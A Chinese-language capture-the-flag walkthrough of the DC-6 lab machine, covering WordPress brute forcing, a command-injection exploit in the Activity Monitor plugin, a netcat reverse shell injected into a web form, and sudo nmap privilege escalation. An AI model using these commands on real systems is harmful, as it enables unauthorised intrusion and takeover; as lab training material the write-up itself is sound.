DC-6靶机渗透测试详细教程
DC-6教程
描述
DC-6 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。
这不是一个过于困难的挑战,所以应该非常适合初学者。
此挑战的最终目标是获得 root 权限并读取唯一的标志。
必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。
使用工具
攻击者:kali 192.168.110.4
靶机:DC-6 192.168.1.191
一、信息收集
0x01 查看存活主机和端口
由于主机和靶机不在同一个网段,这里我们直接使用nmap扫描ip地址和端口
nmap -PS 192.168.1.0/24
0x02 查看端口开放的服务
nmap -sV -T4 -O -p 80,22 192.168.1.191
0x03 查看主机指纹信息
whatweb http://192.168.1.191
0x04 访问靶机HTTP服务
发现浏览器找不到此网站(dns无法解析此ip)
添加“192.168.1.191 wordy”到host文件中(“C:\Windows\System32\drivers\etc\hosts”)
同样在kali的/etc/hosts文件下也加上此语句
vim /etc/hosts
在网站内随便点一下
发现这个地方点进去后有登录选项
二、漏洞发现
0x01 用户名枚举
wpscan --url http://wordy/ -e u
0x02 暴力破解用户名口令
将刚刚枚举到的用户名存储在桌面上的文本文档中
vim users.txt
暴力破解
wpscan --url http://wordy/ -U users.txt -P /usr/share/wordlists/rockyou.txt
使用dirb扫描出来管理员登录界面
dirb http://wordy/
打开登录界面输入账号密码登录
发现activity monitor插件
0x03 漏洞信息查询
尝试搜索此插件的漏洞信息
msfconsole
search activity monitor
查找到一个漏洞,查看使用手册
use exploit/unix/webapp/wp_plainview_activity_monitor_rce
show options
01 背景介绍 WordPress 插件Plainview Activity Monitor存在一个远程命令执行漏洞。Plainview Activity Monitor 是一款网站用户活动监控插件。远程攻击者可以通过构造的url来诱导wordpress管理员来点击恶意链接最终导致远程命令执行。
02 影响范围
Plainview Activity Monitor plugin version <= 20161228
03 利用方式 默认后台
wp-login.php Activity Monitor >tools 用命令执行
04 漏洞序号
CVE-2018-15877
查看漏洞文件
发现这个一个html文件,将html标签复制到一个文件上
vi 45274.html
三、漏洞利用
0x01 命令执行漏洞
尝试拼接命令
ping 192.168.1.191|ls
使用kali监听9999端口
nc -lvvp 9999
在网页框中输入
ping 192.168.110.4| nc -e /bin/bash 192.168.110.4 9999
然后点击Lookup
0x02getshell成功
可以看到我们已经拿到shell
0x03开启终端
python -c ‘import pty;pty.spawn("/bin/bash")’
开启一个python终端
四:提权
0x01查看用户信息
cd 到/home/mark目录下查看文件things-to-do 文档,查看
提示到有用户 graham的口令,尝试su graham切换用户,查看jens用户下文件信息,发现对backups.sh文件具有可执行权限,且以jens用户执行。尝试写入反弹终端命令并执行
查看jens用户下文件信息,发现对backups.sh文件具有可执行权限,且以jens用户执行。尝试写入反弹终端命令并执行
0x02转换身份
echo “/bin/bash” >> backups.sh
sudo -u jens ./backups.sh
尝试以jens身份执行此文件,发现切换成功
0x03 找到提权点
sudo -l 查看用户当前可执行的sudo命令,发现nmap命令执行时以root身份执行,尝试编写提权脚本
echo "os.execute('/bin/bash')">demon.nse
nse为nmap可执行文件后缀,此命令为开启一个终端(以当前身份)
sudo nmap --script=/home/jens/demon.nse
执行此脚本
提权成功
进入到root,找到flag
cat /root/theflag.txt
DC-6总结
hosts定向
wpscan枚举账号(因为是WordPress博客)
wpscan账号密码爆破
dirb目录扫描得到admin登录地址
发现命令注入漏洞
使用burp抓包修改数据反弹shell
打开交互模式 python -c 'import pty;pty.spawn("/bin/bash")'
进入到home目录查看DC-6的用户目录
发现graham账号的密码,进行ssh登录成功
使用sudo -l查看权限
利用命令脚本转换到jens用户
发现可执行root的文件为nmap
创建一个nmap文件执行脚本
只想nmap文件执行脚本获取到root